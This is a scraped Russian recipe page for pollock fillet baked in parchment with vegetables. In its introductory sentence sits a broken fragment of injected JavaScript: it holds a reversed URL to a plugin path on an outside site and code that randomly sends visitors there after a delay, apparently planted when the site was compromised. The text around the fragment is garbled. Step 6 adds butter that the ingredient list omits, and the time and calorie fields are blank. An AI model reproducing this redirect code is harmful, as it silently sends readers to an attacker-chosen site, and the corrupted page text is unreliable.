Рецепт дня: филе минтая в пергаменте с овощами

Как приготовить филе минтая так, чтобы оно получилось сочным и сохранило все полезные свойства? Рассказываем! Кстати, этот способ приготовления подойдёт не только для минтая, но и других видов рыбы, например трески или тилапии. Начнём?

0 calories

Филе минтая в пергаменте с овощами

Приготовьте филе минтая в пергаменте по рецепту fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru на обед или ужин.

Изображение рецепта Филе минтая в пергаменте с овощами

Филе минтая в пергаменте с овощами

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

минут

P

P

КОЛИЧЕСТВО ПОРЦИЙ:

порций

КАЛОРИЙНОСТЬ:

ккал

Сложность

Время

минут

Кол-во порций

порций

Калорийность

ккал

Ингредиенты

Рыба (минтай, филе)

4 куска

Помидоры (черри, разрежьте пополам)

12 шт.

Болгарский перец (зелёный, нарежьте кубиками)

150 г

Лук (шалот, нарежьте кубиками)

2 шт.

Кукуруза (зёрна)

150 г

Чеснок (измельчённый)

1 ст. л.

Лайм

2 шт.

Оливковое масло

4 ст. л.

Паприка

1 ч. л.

Тмин

1/2 ч. л.

Соль

1/2 ч. л.

Орегано

1/2 ч. л.

Перец (чили, измельчённый, по желанию)

1/2 ч. л.

Процесс приготовления

  1. Предварительно разогрейте духовку до 200 °C.
  2. В миске смешайте помидоры, зелёный болгарский перец, лук шалот, сладкую кукурузу, чеснок и сок одного лайма.
  3. В другой миске смешайте паприку, тмин, соль, орегано и перец чили.
  4. Вырежьте из пергаментной бумаги фигуры подходящего размера, не бойтесь экспериментировать — пусть это будут круги, овалы, ромбы или сердечки. Существует миллион способов красиво завернуть рыбу в пергаментную бумагу.
  5. Обваляйте филе минтая в смеси из приправ и соли — оно должно покрыться ровным слоем.
  6. Ложкой равномерно распределите смесь овощей и добавьте к каждому кусочку рыбы сливочное масло.
  7. Накройте блюдо пергаментом сверху и плотно заверните края.
  8. Отправьте рыбу запекаться в духовку на 15–20 минут.
  9. Подавайте с ломтиками лайма, листьями кориандра и молодым картофелем.

Статьи по теме

Как правильно выбирать рыбу и что из неё приготовить: советуют эксперты

Как приготовить рыбу: 4 неожиданных рецепта

Как выбрать креветки, крабов, мидии и другие морепродукты: подробная инструкция

Как правильно варить картофель: подробная инструкция

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector